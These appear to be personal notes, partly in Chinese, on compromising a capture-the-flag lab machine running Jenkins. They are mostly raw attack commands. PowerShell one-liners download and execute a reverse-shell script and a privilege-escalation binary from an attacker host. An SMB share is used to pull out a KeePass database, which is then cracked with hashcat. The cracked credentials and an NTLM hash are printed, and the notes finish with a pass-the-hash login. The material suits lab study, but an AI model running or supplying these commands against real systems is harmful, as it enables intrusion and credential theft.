nmap  -sC -sV  10.129.1.109 > nmap.txt
gobuster dir  -u http://10.129.1.109 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi > gobuster.txt
gobuster dir  -u http://10.129.1.109:50000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi -t 50> gobuster5.txt

powershell -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.26/Invoke-PowerShellTcp.ps1')

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/MSFRottenPotato.exe'); C:\Users\kohsuke\Desktop\ShellTcp1.ps1


kali:提供samba服務
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py timmy `pwd`

victim:連接samba
New-PSDrive -Name "timmy" -PSProvider "FileSystem" -Root "\\10.10.14.26\timmy"
進入到samba資料夾
cd timmy:
echo 123 > 123.txt
cp C:\users\kohsuke\Documents\CEH.kdbx .
將CEH.kdbx轉化成可crack的hash
keepass2john CEH.kdbx---要把前面CEH三個字刪除
拿上https://hashes.com/ 查看 發現是 Possible algorithms: KeePass 1 (AES/Twofish) and KeePass 2 (AES)
使用hashcat爆破

hashcat -m 13400  ceh.hash /usr/share/wordlists/rockyou.txt  >>>得到結果moonshine1
安裝keepass2 使用 得到結果moonshine1密碼打開kdbx檔案
administrator：S1TjAtJHKsugh9oC4VZl
amin:F7WhTrSFDKB6sxHU1cUn
hackerman123:pwndyouall!
bob:lCEUnYPjNfIuPZSzOySA
?:aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00


pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109  cmd

1.nmap掃描出80及50000端口,gobuster掃描50000端口發現askjeeves路徑,打開是jenkins
2.創建jenkins的job執行shell取得revershell
3.在用戶的document下發現CEH.kdbx,將CEH.kdbx 轉成可破解的hash
4.將hash拿上網搜發現是keepass2類型,使用hashcat暴力破解得到密碼
5.安裝keepass2打開CEH.kdbx輸入密碼,可以查看到administrator的ntlm hash
6.使用pth-winexe及ntlm密碼直接登入到機器,